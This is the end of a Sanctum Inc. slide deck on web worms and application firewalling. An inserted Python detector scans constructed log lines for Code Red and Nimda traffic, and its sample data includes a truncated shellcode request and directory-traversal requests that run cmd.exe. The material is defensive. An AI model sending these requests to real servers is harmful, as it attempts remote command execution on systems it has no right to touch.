• Web Worms spread at an astronomical rate

• Recovering from Web Worm damage costs time and money

• Stopping the infection stops the spreading

• Application Firewalling provides automatic default protection
   from Web Worms
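Detection logic for the worm traffic named above, added here as an example rather than anything from the slides or from Sanctum: it runs over a few constructed Combined-format log lines, picks out the request targets the Code Red and Nimda families used (the Code Red target is shortened; the real one carries 224 `N`s) and counts hits per source address. The log lines, the addresses and the signature names are constructed.

```python
import re
from collections import Counter

# Constructed Combined-format log lines (addresses from documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Aug/2001:10:15:22 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 -
198.51.100.77 - - [19/Sep/2001:03:02:11 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
198.51.100.77 - - [19/Sep/2001:03:02:11 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
198.51.100.77 - - [19/Sep/2001:03:02:12 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.8 - - [19/Sep/2001:03:05:40 -0700] "GET /index.html HTTP/1.1" 200 1043
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Request-target signatures.  Code Red I and II hit default.ida with a long
# run of N or X followed by %u-encoded shellcode; Nimda (and hand-driven
# attacks on the same holes) calls root.exe, or cmd.exe via a traversal.
SIGNATURES = [
    ("code-red", re.compile(r"^/default\.ida\?[NX]{20,}%u9090", re.I)),
    ("nimda-root-exe", re.compile(r"/root\.exe\?/c\+", re.I)),
    ("unicode-traversal-cmd",
     re.compile(r"\.\.(?:%c1%1c|%c0%af|%5c|%2f|/).*winnt/system32/cmd\.exe\?/c\+", re.I)),
]


def parse_line(line: str):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, _size = m.groups()
    return {"ip": ip, "time": ts, "method": method, "target": target,
            "status": int(status)}


def classify(target: str):
    """Name of the first matching signature, or None for ordinary traffic."""
    for name, rx in SIGNATURES:
        if rx.search(target):
            return name
    return None


def scan(log_text: str) -> list:
    """(ip, label, status, target) for every line that matches a signature."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec["target"])
        if label:
            hits.append((rec["ip"], label, rec["status"], rec["target"]))
    return hits


def per_source(hits) -> dict:
    """Hits per source IP.  An infected host scans many targets from one
    address, so the per-IP count is what an operator looks at first."""
    return dict(Counter(ip for ip, _, _, _ in hits))


if __name__ == "__main__":
    for ip, label, status, target in scan(SAMPLE_LOG):
        print(ip, label, status, target[:60])
    print(per_source(scan(SAMPLE_LOG)))
```

A 404 on these lines means the probe missed (no such file, or a patched server); a 200 on `/scripts/root.exe` or on the traversal is the line to page on, since it means the server ran the command. The patterns are the signature half of the requirements slide; the normalisation and positive validation shown earlier are the non-signature half that catches the next spelling of the same request.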
  Summary

• Anyone with a browser can launch application level attacks

• The complexity of a Web Application is what creates
   weaknesses in application security

• Common Security Tools Cannot Address Application Level
   Attacks

• Web Worms rely on Application vulnerabilities to enter a site

• Application Firewalling is the only solution to block Browser and
   Automated (worms) attacks against a Web Application
      Steve Pettit
     817- 416-1539
spettit@sanctuminc.com
     Sanctum Inc.
2901 Tasman Dr. Ste 205
 Santa Clara, CA 95054

				